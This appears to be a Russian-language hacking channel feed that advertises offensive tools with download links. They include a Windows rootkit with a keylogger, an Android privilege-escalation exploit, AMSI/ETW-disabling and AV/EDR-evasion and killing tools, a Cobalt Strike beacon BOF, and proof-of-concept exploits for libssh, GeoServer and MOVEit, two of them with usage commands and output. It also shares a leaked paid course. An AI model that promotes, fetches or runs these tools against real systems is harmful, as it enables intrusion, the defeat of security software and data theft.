show time )))

raid forum это конечно хорошо
а вот настоящий слив !
есть ли тут связь ?)
😝

Data Structures & Algorithms Essentials using C++ (2022)
7.3 GB
Link

просто прекрасно

так и живем, на xss запрещают, на экспосе разрешают.
Пронаблюдаем !

придумайте слоган на фильма ))

Rootkit INTRACTABLEGIRAFFE
proof of concept
*
Из прикольного:
Использует скрытую виртуальную файловую систему (VFS) для хранения файлов за пределами стандартной файловой системы Windows. При чем как энергозависимую, так и энергонезависимую скрытую VFS.
Keylogger - для демонстрации
*
download

#windows #rootkit

Какой боевой
hXXp://34.101.154.50/

CVE-2022-20421
Bad Spin: Android Binder Privilege Escalation Exploit
download

#android

Прикольно, но зачем последний октет иксить
brute.fail

#bruteforce

Создаем и обфусцируем DLL которая отключит AMSI и ETW
readME
download LightsOut

SignatureGate
Боевая версия HellsGate, обходящая AV/EDR/EPP путем злоупотребления опциональным исправлением CVE-2013-3900
download

#bypass #edr

DropSpawn
CobaltStrike BOF для создания маяков с использованием DLL Application Directory Hijacking
download

libssh CVE-2023-2283
POC exploit
usage:
~/libssh/build/examples/ssh-client -p 2022 victim@172.18.0.10 ~/id_ed25519.pub

#ssh

SharpTerminator
Поубивать процессы AV/EDR с помощью драйвера ядра
download

#edr

CVE-2023-25157
GeoServer SQL Injection - POC exploit
GeoServer SQL Injection - check vuln noscript

Не обновляйтесь до новой версии Debian 12
critical bugs
Охереть релиз))

#debian #LoL 🧐

MySQL Fake Server
download
+docker

CVE-2023-34362 MOVEit
1. exploit + crt + pem + pub
2. exploit RUBY
Usage:
python CVE-2023-34362.py https://127.0.0.1
[*] Getting sysadmin access token
[*] Got access token
[*] Getting FolderID
[*] Got FolderID: 963611079
[*] Starting file upload
[*] Got FileID: 965943963
[*] Injecting the payload
[*] Payload injected
[*] Triggering payload via resume call
[+] Triggered the payload!
[*] Deleting uploaded file